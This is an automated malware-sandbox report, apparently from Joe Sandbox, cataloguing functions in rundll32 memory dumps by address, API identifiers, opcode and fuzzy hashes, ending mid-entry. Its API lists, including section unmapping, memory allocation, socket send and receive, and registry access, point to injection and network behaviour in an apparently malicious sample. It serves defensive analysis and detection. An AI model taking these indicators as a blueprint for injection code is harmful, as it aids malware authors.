                                      • Instruction ID: 90ed000305aaadcfe281005a19d7c48f5edf41096890c2a4c1cef8799d26cba8
                                      • Opcode Fuzzy Hash: 2ffc94b0a21e48c42bcc45a374f0656ae988c6d857e7144060324a3055d7017d
                                      • Instruction Fuzzy Hash: 0B31C3317489944BFF54AADDA8BC27A3AF5FF54315F60007AE84BC218BDE29DC818685
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C175AC Relevance: 4.6, APIs: 3, Instructions: 72fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$CreateRead_calloc_dbg
                                      • String ID:
                                      • API String ID: 2257410078-0
                                      • Opcode ID: a5499618f628a59e0d96b57db253cb0100af634853b51a4cee71ef425f696bbf
                                      • Instruction ID: ed6115a14a69f00ae2f3e1e7c7b36cdb60c43ae790781c3340ef472217a7c34c
                                      • Opcode Fuzzy Hash: a5499618f628a59e0d96b57db253cb0100af634853b51a4cee71ef425f696bbf
                                      • Instruction Fuzzy Hash: 6611B130608A488FDB90AFA8D88C76A7BE0FB99351F14462EE94EC3290CB3899458751
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3CC36CC Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X
                                      • API String ID: 0-3081909835
                                      • Opcode ID: 5b8f89fd01ffcab5325466948f567bc44c85a99fcdafc58f93a3656588ca7363
                                      • Instruction ID: cf5f19d57574a5a9312ebf2b0440c8f8ff2e7ded93d456333722fa72f4480441
                                      • Opcode Fuzzy Hash: 5b8f89fd01ffcab5325466948f567bc44c85a99fcdafc58f93a3656588ca7363
                                      • Instruction Fuzzy Hash: 9171A272918B088FD768DF69D4991B677F4FB48710B50066FD89BC3692D734B8828B81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C02918 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 228COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: _malloc_dbg
                                      • String ID: !Rex
                                      • API String ID: 1527718024-279350133
                                      • Opcode ID: c06c5c98849e9df7b0606abe95abcd386699ff6728879cc7af8d853c28d6de16
                                      • Instruction ID: ae1ae307db04ce3e5a3436834cc7890ce16b2deaadeebdac6026dea6d25ac4df
                                      • Opcode Fuzzy Hash: c06c5c98849e9df7b0606abe95abcd386699ff6728879cc7af8d853c28d6de16
                                      • Instruction Fuzzy Hash: F171323261CAC44BD776EB95C4AAAEFB7F5FF94300F10492ED48FC2186DE34A5458682
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C02638 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 182COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: _malloc_dbg
                                      • String ID: <
                                      • API String ID: 1527718024-4251816714
                                      • Opcode ID: facb8d15b7ef9ec13e3b09c00d022012f8459e64aea036b22a2031390383be8b
                                      • Instruction ID: c9f254abfc5157ef9140fd0441c2a1390dae8aa9fa256a333fcc1be3fc529878
                                      • Opcode Fuzzy Hash: facb8d15b7ef9ec13e3b09c00d022012f8459e64aea036b22a2031390383be8b
                                      • Instruction Fuzzy Hash: C451E731608A484FDB18EFA9C4D58B677F1FF98304B11066EE84FC7256EA34E941CB81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C10EF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: ErrorFunctionLibraryLoadModeTable
                                      • String ID: {
                                      • API String ID: 3218182252-366298937
                                      • Opcode ID: ce8c5c31cd73c92eaa4bb109d3a5c28e0b34eac1a0d27fbc4dc84f37bbccbbdd
                                      • Instruction ID: 278fdcc996144b4b83484f72655f26cd22aab86d4c46c3ed0f5a60a100018b00
                                      • Opcode Fuzzy Hash: ce8c5c31cd73c92eaa4bb109d3a5c28e0b34eac1a0d27fbc4dc84f37bbccbbdd
                                      • Instruction Fuzzy Hash: 2701A52271CA940AE784B7FA4C262B776F5EF94321F00423AE51FC31C3ED28EC555282
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C246B4 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 214COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: FileVirtual$AllocCreateFreeRead_malloc_dbg
                                      • String ID: MZ
                                      • API String ID: 3094449763-2410715997
                                      • Opcode ID: dc4bd1325c9b6ce831cdb2494975a3abfd7c2e64201de334ba9217b2b9306c25
                                      • Instruction ID: ed4ad43f189e16a38a4304d41d0725dfef76f9acd8bb214fb464de62a31abf1a
                                      • Opcode Fuzzy Hash: dc4bd1325c9b6ce831cdb2494975a3abfd7c2e64201de334ba9217b2b9306c25
                                      • Instruction Fuzzy Hash: C151CC32A5CA844BEFA4EB995C5967B76F1EBD5310F00056AE84FC3186DA38E8414782
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0000025AA3600000 Relevance: 3.2, APIs: 2, Instructions: 193COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320511595.0000025AA3600000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025AA3600000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_25aa3600000_rundll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 82552c8ceb4bd420dba5bcd59e8ddc246d38e28e5f7935b533cdb85efc16f220
                                      • Instruction ID: f4f14c3ad5e0f3b236f775bd8e42857e3eece9bc2c5717d70b29cfbb491f8bf8
                                      • Opcode Fuzzy Hash: 82552c8ceb4bd420dba5bcd59e8ddc246d38e28e5f7935b533cdb85efc16f220
                                      • Instruction Fuzzy Hash: FB51D930628A044BD75EEE58C89B57A73E1FBD5712F24C71EE487C7196EE30E902C685
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C1D200 Relevance: 3.1, APIs: 2, Instructions: 139COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: _malloc_dbg
                                      • String ID:
                                      • API String ID: 1527718024-0
                                      • Opcode ID: 9045cd34264d0f61825811a11acd7615922ca1469bd678ead7aad3f293db595a
                                      • Instruction ID: 130ac661d892996aa7b566cf1777fbeaba2505636e1722e458b70b719c42d59e
                                      • Opcode Fuzzy Hash: 9045cd34264d0f61825811a11acd7615922ca1469bd678ead7aad3f293db595a
                                      • Instruction Fuzzy Hash: 21414731608D0E8FDB94EFA9D89CA75BBF0FB68301710462AD41AC3665DB34EC958BC0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C12677 Relevance: 3.1, APIs: 2, Instructions: 127COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: ??3@_calloc_dbg
                                      • String ID:
                                      • API String ID: 372180527-0
                                      • Opcode ID: 276c063e93356f39a75f1bcb39732f00e41cbb9414687fe3efb2109651a33a7a
                                      • Instruction ID: 62339f15968eab7ba7f9f6cccf13192d8d10fc224f118893c8c8c2ce1902cda6
                                      • Opcode Fuzzy Hash: 276c063e93356f39a75f1bcb39732f00e41cbb9414687fe3efb2109651a33a7a
                                      • Instruction Fuzzy Hash: F8418D32618E488FDB94EF88C495AAA77F1FF98300B500666D54AC7197CA38FD81CB81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C022E4 Relevance: 3.1, APIs: 2, Instructions: 109libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: AddressCallerLibraryLoadProc
                                      • String ID:
                                      • API String ID: 4215043672-0
                                      • Opcode ID: 360a3b14b73cf4ba8c025e592f2c7af1987442e7d978021b0d53979cebde274f
                                      • Instruction ID: 71f951ba933b426831d3778852c0f22e4c1adaa416c1caa6bae9161758014a30
                                      • Opcode Fuzzy Hash: 360a3b14b73cf4ba8c025e592f2c7af1987442e7d978021b0d53979cebde274f
                                      • Instruction Fuzzy Hash: 3D210522A0DA8D4BE7299EF99C5937637F8DB42321F04007BD84BC7193D95DF8C28291
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3CC1A14 Relevance: 3.1, APIs: 2, Instructions: 89COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 472e16019ba601094a4c2923f039f601fa415deb3ae2891c44a4e6fa2e872d25
                                      • Instruction ID: a67831136c9623a5ff4a6bfe7dac3addc0504db0ed5ee7cca6411da3dbd74004
                                      • Opcode Fuzzy Hash: 472e16019ba601094a4c2923f039f601fa415deb3ae2891c44a4e6fa2e872d25
                                      • Instruction Fuzzy Hash: E7212371A088184FDF94EB9EC0E89757BF1EF98B507A512A1D81BC729AD525ECC187C0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C1E130 Relevance: 3.1, APIs: 2, Instructions: 71memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: a87dd15c5b21502df9a9a1958824b3b0c87cd0723e622a5a78e91728434a00fc
                                      • Instruction ID: 9326d94ed21192ec8f8870d97dd74e6a8657029828cb66361362085847e33fc6
                                      • Opcode Fuzzy Hash: a87dd15c5b21502df9a9a1958824b3b0c87cd0723e622a5a78e91728434a00fc
                                      • Instruction Fuzzy Hash: 8D114232708D484FEF85FBA9AC999BA77B6EBE5300704452AE40BC3155DE38D9498781
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C455E8 Relevance: 1.8, APIs: 1, Instructions: 281networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: Recv
                                      • String ID:
                                      • API String ID: 4192927123-0
                                      • Opcode ID: 0ed6c12643ef064cbca3101121e01caf1c0bee925d3670dd1d08c5da83a7306d
                                      • Instruction ID: eaa35f74f579441f84c4fb2f26049d14f25490c93a1d257de1548169768d21c1
                                      • Opcode Fuzzy Hash: 0ed6c12643ef064cbca3101121e01caf1c0bee925d3670dd1d08c5da83a7306d
                                      • Instruction Fuzzy Hash: E0A1A732A18B898FE7949BDD84986B6BBF1FF54314F50013AD44FC658ADB38EC918781
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C1F200 Relevance: 1.7, APIs: 1, Instructions: 245registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: Open
                                      • String ID:
                                      • API String ID: 71445658-0
                                      • Opcode ID: b1be3cc22f8079cd234e0ae30197ecf8b34efb11fdb22abb88b5cc59e6195b50
                                      • Instruction ID: 3abb96ae819eaabc87cc6e1b8f1a048f1c8769e6f987f3a1c6401b8ac4c1e9dd
                                      • Opcode Fuzzy Hash: b1be3cc22f8079cd234e0ae30197ecf8b34efb11fdb22abb88b5cc59e6195b50
                                      • Instruction Fuzzy Hash: DA91CB7151CB888FE764EF69C4997AAB7F1FB98301F00492AE58EC3251DB34E944DB42
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C45384 Relevance: 1.7, APIs: 1, Instructions: 227networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: Send
                                      • String ID:
                                      • API String ID: 121738739-0
                                      • Opcode ID: 025fd1521b03c48df47ad88bd262d16e2d3cd050fdda3960f0fce3c1fd7bbae2
                                      • Instruction ID: 24f3d36d08e04bc630504e1701c1044aae686e7f6663a9b7f3b32f68d17677ce
                                      • Opcode Fuzzy Hash: 025fd1521b03c48df47ad88bd262d16e2d3cd050fdda3960f0fce3c1fd7bbae2
                                      • Instruction Fuzzy Hash: B081C071508A458FEB98EFADC4987A2BBF1FF14314F10426AD44EC7696DB34E884CB80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C18C4C Relevance: 1.7, APIs: 1, Instructions: 173registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: Open
                                      • String ID:
                                      • API String ID: 71445658-0
                                      • Opcode ID: adb4356cc9c6a87139024e7379dcd3893e31279c0e3ba0ae376689aa6833c1b8
                                      • Instruction ID: 24bf184352179f5858eb3a327cfcf8a25a5dd3318c420f46666027839474af71
                                      • Opcode Fuzzy Hash: adb4356cc9c6a87139024e7379dcd3893e31279c0e3ba0ae376689aa6833c1b8
                                      • Instruction Fuzzy Hash: 06515E7162CB488FD748DF99D88556A7BE1FB99701F10052FE48BC2352DA34E882CB83
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C44D7C Relevance: 1.7, APIs: 1, Instructions: 167networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: Recv
                                      • String ID:
                                      • API String ID: 4192927123-0
                                      • Opcode ID: a5be54a69f3bf84269773a6cd7379ea69bad9d593bf99f2bbeacdfaef6688a3f
                                      • Instruction ID: 585ff5fd21759cee9f9ff1d6f9e9a428e7fdbbd6025103bd3345f2f11f8dddc0
                                      • Opcode Fuzzy Hash: a5be54a69f3bf84269773a6cd7379ea69bad9d593bf99f2bbeacdfaef6688a3f
                                      • Instruction Fuzzy Hash: C2515D71508A898FE7A4DFADC8A87A6BBF4FF14314F60056AD44EC3596DB39E480CB41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C13E3A Relevance: 1.6, APIs: 1, Instructions: 131fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007DF4B3C22FA4: NtUnmapViewOfSection.NTDLL ref: 00007DF4B3C23034
                                        • Part of subcall function 00007DF4B3C22FA4: VirtualAlloc.KERNELBASE ref: 00007DF4B3C23056
                                        • Part of subcall function 00007DF4B3C22FA4: NtSetInformationFile.NTDLL ref: 00007DF4B3C23098
                                      • MapViewOfFile.KERNELBASE ref: 00007DF4B3C13FB7
                                        • Part of subcall function 00007DF4B3C22FA4: NtClose.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00007DF4B3C230D0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: FileView$AllocCloseInformationSectionUnmapVirtual
                                      • String ID:
                                      • API String ID: 3911742341-0
                                      • Opcode ID: 502e52437849565e925d83ccf3de6c5e9e7ab8b63f1dbba070af9e040f3b2d98
                                      • Instruction ID: b010f9c57ff26042eef7acc556e0b21c85a1be9f9b798a60d810cfa217a8c899
                                      • Opcode Fuzzy Hash: 502e52437849565e925d83ccf3de6c5e9e7ab8b63f1dbba070af9e040f3b2d98
                                      • Instruction Fuzzy Hash: 4E415331608D498FEB55FBA9C4696BAB7B1FF94300F00462AE55FC3192CF39E8558B81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3CADDDC Relevance: 1.6, APIs: 1, Instructions: 123COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: _malloc_dbg
                                      • String ID:
                                      • API String ID: 1527718024-0
                                      • Opcode ID: bd9e178f38e0b91e4b85d738bcd5c00a0e2b0c53e8645be7d9516bb73a9f62d0
                                      • Instruction ID: b0df3eaf14432d5a721fcd732f21eba063a094562d37fa5163c98a6cc91ba5f0
                                      • Opcode Fuzzy Hash: bd9e178f38e0b91e4b85d738bcd5c00a0e2b0c53e8645be7d9516bb73a9f62d0
                                      • Instruction Fuzzy Hash: B631FA21A0CA8A5BE7989BED847D3B27BF1FF55310F14417AD44FC6287DA18A8CB8341
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C1F9B8 Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: b321590e39003328950868adb3b7baf0a738c2a81c9ed83129ade6c1723d170f
                                      • Instruction ID: 846444fe3d3f6f7f61390c9327183cf43833226a259b8af34df7ef105ae5ce76
                                      • Opcode Fuzzy Hash: b321590e39003328950868adb3b7baf0a738c2a81c9ed83129ade6c1723d170f
                                      • Instruction Fuzzy Hash: 2731F831618D098FDF85EF59C4A8BA537B0FF59310F4841B9D80ECB29ACA39AC95CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C45B2C Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: setsockopt
                                      • String ID:
                                      • API String ID: 3981526788-0
                                      • Opcode ID: c3d1e43800537302380f5b1396f955236f14e3c54ea5244c42555eb7a83783ad
                                      • Instruction ID: e79bb992a0125a27b8e3d4738c41ccd1bda83a14440021b2bfc64b0ab6de65a3
                                      • Opcode Fuzzy Hash: c3d1e43800537302380f5b1396f955236f14e3c54ea5244c42555eb7a83783ad
                                      • Instruction Fuzzy Hash: 9B316D71A04A458FEB98DF9DC0987617BF1FF18324F1442AAD81ACB2DADB349C85CB40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C1D454 Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: _malloc_dbg
                                      • String ID:
                                      • API String ID: 1527718024-0
                                      • Opcode ID: 6791125b6041b40252ec0e29d125b26a70b6bb3ad06553c4cc4837f4d2123a91
                                      • Instruction ID: 8aea98eca284d79c1ca9375ca9cc5d96f09d3040ec9e2e441a70e1520f647727
                                      • Opcode Fuzzy Hash: 6791125b6041b40252ec0e29d125b26a70b6bb3ad06553c4cc4837f4d2123a91
                                      • Instruction Fuzzy Hash: B3218E32614D0C8FDB59EF5DD88C6B277E1EBA831170442ABD80ACB265DA25E8848B81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C1B760 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 844d00f62b8cf5e70495a8abac675de53b76fbb5ce2c42a1bf6d18f5a51ba4cf
                                      • Instruction ID: c12a5b4a455d3262b147a134d61df17b728cafa7f091b1956dc0af044d75644d
                                      • Opcode Fuzzy Hash: 844d00f62b8cf5e70495a8abac675de53b76fbb5ce2c42a1bf6d18f5a51ba4cf
                                      • Instruction Fuzzy Hash: 59119A32618D494EEB5497E6C89C73236B0EF44720F500276D91BC22D2DF2CDCD5DA90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C120C0 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                      Download Yara Rule
                                      APIs
                                      • _calloc_dbg.MSVCRT(?,?,?,?,?,?,-00000001,?,00000000,00007DF4B3C13945), ref: 00007DF4B3C120E1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: _calloc_dbg
                                      • String ID:
                                      • API String ID: 1170608187-0
                                      • Opcode ID: c51590aacd85f655efd91063ad02dae0314de1845b802f39fd2b5bf8436abf74
                                      • Instruction ID: 514dd88d399a9e37405cfe7c2ac464732ac13e8484702d2bb9fbdc7639deb3e9
                                      • Opcode Fuzzy Hash: c51590aacd85f655efd91063ad02dae0314de1845b802f39fd2b5bf8436abf74
                                      • Instruction Fuzzy Hash: E4018032609E0C8FE754EF9AE8C86A23BF1EB68311701426BD809C7266DE34D880C7D0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0000025AA3604EB0 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320511595.0000025AA3600000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025AA3600000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_25aa3600000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: f6e73972739c194d795b157926e15302b96fde7321bde8de7d486285f80fee4f
                                      • Instruction ID: a003018118bc257e968f20c07e3c45a6ae799a4c2fd9cd3de475e7d7ad4f33ad
                                      • Opcode Fuzzy Hash: f6e73972739c194d795b157926e15302b96fde7321bde8de7d486285f80fee4f
                                      • Instruction Fuzzy Hash: 2A018F71A14E195BE7A4AE289C4A36677E0FBC9356F054236A819C3281DA34DC90CBC5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C16E1C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                      Download Yara Rule
                                      APIs
                                      • ??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,?,?,-00000001,00007DF4B3C17EC3), ref: 00007DF4B3C16E63
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 8daca81c3d0f5f89cf6fe5a3ed5ac884db543bf125681da9b4c854e5f3ab5189
                                      • Instruction ID: 54c801eadebf969bc673af5b4e5a8e1ba1b2b47247209a6d6a1c644e01fcce77
                                      • Opcode Fuzzy Hash: 8daca81c3d0f5f89cf6fe5a3ed5ac884db543bf125681da9b4c854e5f3ab5189
                                      • Instruction Fuzzy Hash: E301FB31204C4D9FDF84EB59C4D8E6577F1EB6831471446BAD40DCB246DA25EC92CB80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C1D3F4 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 1173c4bf6734c2ddcbf1999c0336684670098a1b8ff3ecb332de893cda3149d8
                                      • Instruction ID: fa73f821edad7d6c2502f4a653935f0b48303d3554c8b21e597b10c231954f18
                                      • Opcode Fuzzy Hash: 1173c4bf6734c2ddcbf1999c0336684670098a1b8ff3ecb332de893cda3149d8
